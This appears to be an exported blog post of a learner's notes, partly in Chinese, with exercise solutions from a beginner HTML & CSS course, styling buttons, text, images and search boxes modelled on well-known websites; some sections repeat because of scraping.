    7. Images and Text Boxes

    <!DOCTYPE HTML>
    <html>
    <head>
    <title>YouTube.com Clone</title>
    <style>
    .thumbnail {
    width: 300px;
    }
    .search-bar {
    font-size: 20px;
    margin-left: 12px;
    }
    </style>
    </head>
    <body>
    <img class="thumbnail" src="thumbnails/thumbnail-1.webp">
    <input class="search-bar" type="text" placeholder="Search">
    </body>
    </html>

    png


    png

    • 7a 7b 7c
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    ._7a {
    width: 200px;
    border-radius: 30px;
    }
    ._7b {
    width: 160px;
    height: 160px;
    object-fit: cover;
    object-position: center;
    }
    ._7c {
    width: 160px;
    height: 160px;
    object-fit: cover;
    object-position: center;
    border-radius: 80px;
    }
    </style>
    </head>
    <body>
    <img class="_7a" src="picture.jpg">
    <img class="_7b" src="picture.jpg">
    <img class="_7c" src="picture.jpg">
    </body>
    </html>

    png

    png

    • 7d 7e
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    ._7d {
    margin:10px;
    border-width: 1px;
    border-color: #AAA;
    padding: 8px 5px;
    border-radius: 4px;
    }
    ._7e {
    margin: 10px;
    width: 60%;
    padding: 8px 5px;
    border-radius: 13px;
    border: none;
    box-shadow: 2px 2px 10px rgba(0, 0, 0, 0.2);
    }
    </style>
    </head>
    <body>
    <input class="_7d" type="text" placeholder="Search"><br/>
    <input class="_7e" type="text" placeholder="Search Google or type a URL">
    </body>
    </html>

    png

    **Challenge Exercise **

    • 7f 7g
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    .text {
    color: #333;
    font-size: 12px;
    margin: 2px;
    }
    .input_box {
    padding: 5px;
    width: 320px;
    margin: 2px;
    border-radius: 3px;
    border-color: #666;
    }
    .join_button {
    margin-top: 10px;
    padding: 10px 125px;
    color: #FFF;
    border: none;
    border-radius: 20px;
    background-color: rgb(48, 109, 199);
    }
    </style>
    </head>
    <body>
    <p class="text">Email</p>
    <input class="input_box" type="text">
    <p class="text">By clicking Agree & join, you agree to the Privacy Policy.</p>
    <button class="join_button">Agree & Join</button>
    </body>
    </html>

    png

    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    .profile {
    vertical-align: middle;
    width: 50px;
    height: 50px;
    object-fit: cover;
    border-radius: 25px;
    margin-right: 10px;
    }
    .text {
    vertical-align: middle;
    color: #888;
    margin-right: 100px;
    }
    .tweet {
    vertical-align: middle;
    background-color: rgb(12, 117, 203);
    padding: 10px 15px;
    font-weight: bold;
    border-radius: 20px;
    color:#FFF;
    border:none;
    }
    </style>
    </head>
    <body>
    <img class="profile" src="picture.jpg">
    <span class="text">What's happening?</span>
    <button class="tweet">Tweet</button>
    </body>
    </html>

    png

    8. CSS Display Property

    • display property
      • block element = takes up the entire line

    9. The div Element

    10. Nested Layouts Technique

    11. CSS Grid

    12. Flexbox

    13. Nested Flexbox

    14. CSS Position

    15. Position Absolute and Relative

    16. Finish the Project

    17. More CSS Features

    Outro

    ]]>
    + 资源

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

    课程

    6. The HTML Structure

    教你在 VS Code 里安装 Live Server,这样就可以实时写网页时刷新网页:

    png

    介绍了 HTML 的正式结构,添加<!DOCTYPE html><html><head><body>等。

    使用<link rel="stylesheet" href="XX.css">引用 css。

    png


    png

    • 6d

    website.html:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    <!DOCTYPE html>
    <html>
    <head>
    <title>Model 3</title>
    <link rel="stylesheet" href="styles/6d.css">
    </head>
    <body>
    <p class="title">Model 3</p>
    <p>
    <span class="decription">
    Order Online for
    </span>
    <span class="link">
    Touchless Delivery
    </span>
    </p>
    </body>
    </html>

    styles/6d.css:

    因为在国内 Google Font 不好使,所以用此法替代:HTML5如何引入外部字体?亲测有效_52Hertz____的博客-CSDN博客_h5引入字体

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    @font-face {
    font-family: "HYFengShangHei_75W";
    src:url("/styles/HYFengShangHei_75W.ttf")
    }
    p {
    text-align: center;
    font-family: HYFengShangHei_75W;
    margin:0;
    margin-top: 15px;
    }
    .title {
    font-weight: bold;
    font-size: 40px;
    }
    .decription {
    font-size: 25px;
    }
    .link {
    font-size: 25px;
    text-decoration: underline;
    }

    png

    7. Images and Text Boxes

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>YouTube.com Clone</title>
    <style>
    .thumbnail {
    width: 300px;
    }
    .search-bar {
    font-size: 20px;
    margin-left: 12px;
    }
    </style>
    </head>
    <body>
    <img class="thumbnail" src="thumbnails/thumbnail-1.webp">
    <input class="search-bar" type="text" placeholder="Search">
    </body>
    </html>

    png


    png

    • 7a 7b 7c
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    ._7a {
    width: 200px;
    border-radius: 30px;
    }
    ._7b {
    width: 160px;
    height: 160px;
    object-fit: cover;
    object-position: center;
    }
    ._7c {
    width: 160px;
    height: 160px;
    object-fit: cover;
    object-position: center;
    border-radius: 80px;
    }
    </style>
    </head>
    <body>
    <img class="_7a" src="picture.jpg">
    <img class="_7b" src="picture.jpg">
    <img class="_7c" src="picture.jpg">
    </body>
    </html>

    png

    png

    • 7d 7e
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    ._7d {
    margin:10px;
    border-width: 1px;
    border-color: #AAA;
    padding: 8px 5px;
    border-radius: 4px;
    }
    ._7e {
    margin: 10px;
    width: 60%;
    padding: 8px 5px;
    border-radius: 13px;
    border: none;
    box-shadow: 2px 2px 10px rgba(0, 0, 0, 0.2);
    }
    </style>
    </head>
    <body>
    <input class="_7d" type="text" placeholder="Search"><br/>
    <input class="_7e" type="text" placeholder="Search Google or type a URL">
    </body>
    </html>

    png

    **Challenge Exercise **

    • 7f 7g
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    .text {
    color: #333;
    font-size: 12px;
    margin: 2px;
    }
    .input_box {
    padding: 5px;
    width: 320px;
    margin: 2px;
    border-radius: 3px;
    border-color: #666;
    }
    .join_button {
    margin-top: 10px;
    padding: 10px 125px;
    color: #FFF;
    border: none;
    border-radius: 20px;
    background-color: rgb(48, 109, 199);
    }
    </style>
    </head>
    <body>
    <p class="text">Email</p>
    <input class="input_box" type="text">
    <p class="text">By clicking Agree & join, you agree to the Privacy Policy.</p>
    <button class="join_button">Agree & Join</button>
    </body>
    </html>

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    <!DOCTYPE HTML>
    <html>
    <head>
    <title>7</title>
    <style>
    .profile {
    vertical-align: middle;
    width: 50px;
    height: 50px;
    object-fit: cover;
    border-radius: 25px;
    margin-right: 10px;
    }
    .text {
    vertical-align: middle;
    color: #888;
    margin-right: 100px;
    }
    .tweet {
    vertical-align: middle;
    background-color: rgb(12, 117, 203);
    padding: 10px 15px;
    font-weight: bold;
    border-radius: 20px;
    color:#FFF;
    border:none;
    }
    </style>
    </head>
    <body>
    <img class="profile" src="picture.jpg">
    <span class="text">What's happening?</span>
    <button class="tweet">Tweet</button>
    </body>
    </html>

    png

    8. CSS Display Property

    • display property
      • block element = takes up the entire line

    9. The div Element

    10. Nested Layouts Technique

    11. CSS Grid

    12. Flexbox

    13. Nested Flexbox

    14. CSS Position

    15. Position Absolute and Relative

    16. Finish the Project

    17. More CSS Features

    Outro

    ]]>
    @@ -9061,7 +9061,7 @@ /posts/Web-HTML%20&%20CSS%20Full%20Course%20-%20Beginner%20to%20Pro%20(2022)%20(0-5)/ - 资源

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

    课程

    Intro

    ​ In this full course, we learn how to build websites with HTML and CSS, and get started as a software engineer.

    ​ Additional Information: This HTML CSS full course is a series of HTML CSS tutorials, teaching the major skills that we need to create complex websites. Each HTML CSS tutorial builds on a project and provides some HTML CSS exercises to practice what we learned. By the end, we’ll learn the basics of web development and we’ll be on our way to becoming a web developer and software engineer.

    ​ 其他信息:这个 HTML CSS 完整课程是一系列的 HTML CSS 教程,教授我们创建复杂网站所需的主要技能。每个 HTML CSS 教程都建立在一个项目的基础上,并提供一些 HTML CSS 练习来练习我们所学的知识。到最后,我们将学会网站开发的基础知识,我们将在成为一名网站开发人员和软件工程师的路上。

    1. HTML Basics

    HTML: HyperText Markup Language (tool we use to create websites)


    png

    • 1a. Create a button with the text “Click” inside
    <button>Click</button>

    • 1b. Create 2 buttons. 1 with your name and 1 with your favorite food
    <button>GZ</button>
    <button>dumplings</button>

    • 1c. Create a paragraph with the text “Hello, World!” inside
    <p>Hello, world!</p>

    Hello, world!

    • 1d. Create a paragraph below the previous paragraph and write something you did today
    <p>Hello, world!</p>
    <p>Today I got up early.</p>

    Hello, world!

    Today I got up early.

    png

    • 1e. Create a link to google.com (or a similar website for your country)
    <a href="https://www.bilibili.com/">Open bilibili</a>

    Open bilibili

    • 1f. Make the link from the previous exercise (1e.) open in a new tab
    <a href="https://www.bilibili.com/" target="_">Open bilibili</a>

    Open bilibili

    **Challenge Exercise **

    • 1g. Try to copy this design using HTML (the link goes to amazon.com)
    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p>Nike Black Running Shoes</p>
    <p>$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button>Add to Cart</button>
    <button>Buy now</button>

    Back to TaoBao

    Nike Black Running Shoes

    $39 - in stock.

    Free delivery tomorrow.


    2. CSS Basics

    CSS: Cascading Style Sheets (change the appearance of HTML elements)

    Youtube & Tweet

    <style>
    .subscribe-button {
    background-color: rgb(200, 0, 0);
    color: white;
    border: none;
    height: 36px;
    width: 105px;
    border-radius: 2px;
    cursor: pointer;
    margin-right: 8px;
    }

    .join-button {
    background-color: white;
    border-color: rgb(41, 118, 211);
    border-style: solid;
    border-width: 1px;
    color: rgb(41, 118, 211);
    height: 36px;
    width: 62px;
    border-radius: 2px;
    cursor: pointer;
    }

    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    height: 36px;
    width: 74px;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    png

    • 2a. Uber
    • 2b. Amazon
    • 2c. GitHub
    • 2d. Bootstrap
    • 2e. Linkedln
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    width: 105px;
    height: 36px;
    cursor: pointer;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    width: 160px;
    height: 36px;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    height:40px;
    width:95px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    height:40px;
    width:105px;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:105px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 250px;
    cursor: pointer;
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:75px;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    png

    **Challenge Exercise **

    • 2f. Continuing from exercise 1g. recreate this design using CSS:
    <style>
    .title{
    margin: 20px 0px;
    font-size: 25px;
    font-weight: bold;
    }
    .price{
    color:rgb(0, 118, 0);
    font-size: 18px;
    font-weight: bold;
    }
    .Amazon-button-1{
    background-color: rgb(255, 216, 20);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    }
    .Amazon-button-2{
    background-color: rgb(255, 164, 28);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    png

    3. Hovers, Transitions, Shadows

    ​ 注意 Transitions 属性不要放到 hover 里, 否则移出时不会有 Transitions 的效果。

    <style>
    .subscribe-button {
    background-color: rgb(200, 0, 0);
    color: white;
    border: none;
    height: 36px;
    width: 105px;
    border-radius: 2px;
    cursor: pointer;
    margin-right: 8px;
    transition: opacity 0.15s;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(41, 118, 211);
    border-style: solid;
    border-width: 1px;
    color: rgb(41, 118, 211);
    height: 36px;
    width: 62px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(41, 118, 211);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    height: 36px;
    width: 74px;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    gif

    <style>
    .Uber-button{
    color: white;
    background-color: black;
    width: 105px;
    height: 36px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    width: 160px;
    height: 36px;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    height:40px;
    width:95px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    height:40px;
    width:105px;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:105px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
    color: white
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 250px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    height:40px;
    width:75px;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    **Challenge Exercise **

    gif

    <style>
    a:hover {
    color:rgb(198, 96, 22);
    }
    .title{
    margin: 20px 0px;
    font-size: 25px;
    font-weight: bold;
    }
    .price{
    color:rgb(0, 118, 0);
    font-size: 18px;
    font-weight: bold;
    }
    .Amazon-button-1{
    background-color: rgb(255, 216, 20);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Amazon-button-1:hover {
    background-color: rgb(240, 200, 16);
    }
    .Amazon-button-1:active {
    opacity: 0.5;
    }
    .Amazon-button-2{
    background-color: rgb(255, 164, 28);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    height: 40px;
    width: 140px;
    margin-right: 10px;
    font-size: 16px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Amazon-button-2:hover {
    background-color: rgb(237, 120, 8);
    }
    .Amazon-button-2:active {
    opacity: 0.5;
    }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    4. Chrome DevTools & CSS Box Model

    CSS Box Model

    • how much space an element takes up
    • how far it is away from other elements

    gif

    • 4a. - 4e. Modify exercises 3a. - 3e. to use padding instead of height/width
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    padding: 8px 10px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    padding: 10px 26px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
    color: white
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
    font-size: 15px;
    font-weight: bold;
    padding: 12px 26px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Linkedln-button-1:hover{
    background-color: rgb(7, 57, 117);
    }
    .Linkedln-button-2{
    color:rgb(10, 102, 194);
    background-color: white;
    border-color: rgb(10, 102, 194);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-size: 15px;
    font-weight: bold;
    border-radius: 20px;
    cursor: pointer;
    transition: border-width 0.15s,
    background-color 0.15s;
    }
    .Linkedln-button-2:hover {
    background-color: #EEF;
    border-width: 3px;
    }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Chart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    • 4f. Update the Tweet button to use padding instead of height/width
    • 4g. Use the Chrome DevTools to get the exact color for the Subscribe button and update it int the code
    <style>
    .subscribe-button {
    background-color: rgb(193, 0, 0);
    color: white;
    border: none;
    padding: 10px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: opacity 0.15s;
    vertical-align: top;
    }
    .subscribe-button:hover {
    opacity: 0.8;
    }
    .subscribe-button:active {
    opacity: 0.4;
    }
    .join-button {
    background-color: white;
    border-color: rgb(6, 95, 212);
    border-style: solid;
    border-width: 1px;
    color: rgb(6, 95, 212);
    padding: 9px 16px;
    border-radius: 2px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .join-button:hover {
    background-color: rgb(6, 95, 212);
    color: white;
    }
    .join-button:active{
    opacity: 0.7;
    }
    .tweet-button {
    background-color: rgb(2, 158, 255);
    color: white;
    border: none;
    border-radius: 18px;
    font-weight: bold;
    font-size: 15px;
    cursor: pointer;
    margin-left: 8px;
    transition: box-shadow 0.15s;
    padding: 10px 16px;
    vertical-align: top;
    }
    .tweet-button:hover {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
    }
    </style>
    <button class="subscribe-button">
    SUBSCRIBE
    </button>
    <button class="join-button">
    JOIN
    </button>
    <button class="tweet-button">
    Tweet
    </button>

    png

    gif

    **Challenge Exercise **

    • 4h. Pagination
    <style>
    button{
    padding: 6px 2px;
    margin: 0px 5px;
    }
    a{
    margin: 0px 2px;
    }
    </style>
    <button>
    Back
    </button>
    <a href="https://www.youtube.com/">1</a>
    <a href="https://www.youtube.com/">2</a>
    <a href="https://www.youtube.com/">3</a>
    <a href="https://www.youtube.com/">4</a>
    <a href="https://www.youtube.com/">5</a>
    <button>
    Next
    </button>

    png

    • 4i. - 4k.
    <style>
    button{
    background-color: rgb(11, 136, 6);
    color: white;
    font-size: 15px;
    margin: 10px;
    vertical-align: top;
    border:none;
    padding: 6px 10px;
    }
    .stretch_button{
    transition: padding 1s;
    }
    .stretch_button:hover{
    padding: 12px 30px;
    }
    ._3d_click_button {
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.4);
    }
    ._3d_click_button:active {
    margin-top: 15px;
    margin-left: 15px;
    box-shadow: none;
    }
    .margin_and_padding_together {
    transition: padding 0.3s,
    margin 0.3s;
    }
    .margin_and_padding_together:hover {
    margin-left: 5px;
    margin-right: 5px;
    padding-left: 15px;
    padding-right: 15px;
    }
    </style>
    <button class="stretch_button">Stretch</button>
    <button class="_3d_click_button">Shadow</button>
    <br/>
    <button class="margin_and_padding_together">One</button>
    <button class="margin_and_padding_together">Two</button>
    <button class="margin_and_padding_together">Three</button>

    png

    5. Text Styles

    • CSS Specificity: class name selector > element name selector

    • google 搜索 html entity greater than 得到 > 的 Entity Number &#62;

    <style>
    p {
    font-family: Arial;
    margin-top: 0;
    margin-bottom: 0;
    }
    .video-title {
    font-size: 18px;
    font-weight: bold;
    width: 280px;
    line-height: 24px;
    margin-bottom: 5px;
    }
    .video-stats {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-author {
    font-size: 14px;
    color: #606060;
    margin-top: 0;
    margin-bottom: 20px;
    }
    .video-description {
    font-size: 14px;
    color:#606060;
    width: 280px;
    line-height: 20px;
    line-height: 22px;
    margin-top: 0;
    margin-bottom: 100px;
    }
    .apple-text {
    margin-bottom: 50px;
    font-size: 14px;
    background-color: #e34140;
    color: white;
    text-align: center;
    padding-top: 18px;
    padding-bottom: 18px;
    }
    .shop-link {
    margin-left: 5px;
    cursor: pointer;
    }
    .shop-link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="video-title">
    Talking Tech and AI with Google CEO Sundar Pichai!
    </p>

    <p class="video-stats">
    3.4M views &#183; 6month ago
    </p>

    <p class="video-author">
    Marques Brownlee &#10003;
    </p>

    <p class="video-description">
    Talking tech and AI on the heels of Google I/O.
    Also a daily driver phone reveal from Google's CEO.
    Shoutout to Sundar!
    </p>

    <p class="apple-text">
    Shop early for the best selection of holiday favourites.
    <span class="shop-link">Shop now &#62;</span>
    </p>

    png


    png

    • 5a. font = Tahoma
    <style>
    p {
    font-family: Tahoma;
    font-weight: bold;
    font-size: 24px;
    }
    </style>

    <p> This is Tahoma Font</p>

    png

    • 5b. font = Arial
    <style>
    p {
    font-family: Arial;
    }
    .title {
    font-weight: bold;
    font-size: 24px;
    margin: 0;
    }
    .introduce {
    color: red;
    font-style: italic;
    font-size: 16px;
    margin-top: 10px;
    }
    </style>

    <p class="title">Biggest Deals of the Year!</p>
    <p class="introduce">Sales end Tuesday</p>

    png

    • 5c. font = Verdana
    <style>
    p {
    font-family: Verdana;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin: 0;
    }
    .introduce {
    margin-top: 5px;
    color: #606060;
    }
    .decription {
    width: 300px;
    }
    .start_button {
    padding: 5px 12px;
    background-color: rgb(49, 126, 18);
    border: 0;
    border-radius: 5px;
    color: white;
    }
    </style>

    <p class="title">HTML CSS Course</p>
    <p class="introduce">Beginner to Pro</p>
    <p class="decription">
    In this course, we'll learn the skills
    you need to become a developer.
    </p>
    <button class="start_button">Get Started</button>

    png

    • 5d. font = Arial
    <style>
    p {
    font-family: Arial;
    }
    .title {
    text-align: center;
    font-weight: bold;
    font-size: 30px;
    margin-bottom: 0;
    }
    .introduce {
    margin-top: 14px;
    text-align: center;
    }
    .link {
    text-align: center;
    color:rgb(0, 147, 196);
    cursor: pointer;
    }
    .link:hover {
    text-decoration: underline;
    }
    </style>

    <p class="title">Shopping for your business?</p>
    <p class="introduce">See how Apple at Work can help.</p>
    <p class="link">Learn more &#62;</p>

    png

    png

    **Challenge Exercise **

    • 5e.
    <style>
    p {
    text-align: center;
    font-family: Arial;
    margin: 0;
    }
    .new {
    font-weight: bold;
    color: orange;
    }
    .title {
    font-weight: bold;
    font-size: 20px;
    margin-top: 5px;
    }
    .decription {
    font-weight: bold;
    font-size: 35px;
    margin-top: 5px;
    }
    .price {
    margin-top: 10px;
    }
    .buy_button {
    margin-top: 10px;
    color:white;
    font-family: Arial;
    border:none;
    padding: 5px 12px;
    border-radius: 16px;
    background-color: rgb(29, 115, 207);
    }
    </style>

    <p class="new">New</p>
    <p class="title">MacBook Pro</p>
    <p class="decription">Supercharged for pros.</p>
    <p class="price">From $1999</p>
    <center><button class="buy_button">Buy</button></center>

    png

    • 5f.
    <style>
    p {
    font-family: Arial;
    margin-top: 6px;
    margin-bottom: 6px;
    }
    .current {
    font-size: 32px;
    }
    .usd {
    color: #606060;
    }
    .rise {
    color:green;
    }
    .after_hours {
    color: #606060;
    }
    .decline {
    color:rgb(208, 0, 0);
    }
    </style>
    <p>
    <span class="current">1049.61 </span>
    <span class="usd">USD</span>
    </p>
    <p class="rise">+18.05 (1.75%) today</p>
    <p>
    <span class="after_hours">After hours 1,048.00 </span>
    <span class="decline">-1.61 (0.15%)</span>
    </p>

    png

    • 5g.
    <style>
    p {
    font-family: Arial;
    margin-top: 8px;
    margin-bottom: 8px;
    }
    .title {
    font-weight: bold;
    }
    .author {
    color:#888;
    }
    .at {
    color:rgb(31, 169, 255);
    }
    .text {
    margin-top: 18px;
    }
    </style>
    <p>
    <span class="title">freeCodeCamp.org</span>
    <span class="author">@freeCodeCamp 1h</span>
    </p>
    <p>As a web developer, you'll want to make your projects easy to use and navigate around.</p>
    <p class="text">
    Here
    <span class="at">@chp_it</span>
    outlines the top skills new developers should have.
    </p>

    png

    ]]>
    + 资源

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

    课程

    Intro

    ​ In this full course, we learn how to build websites with HTML and CSS, and get started as a software engineer.

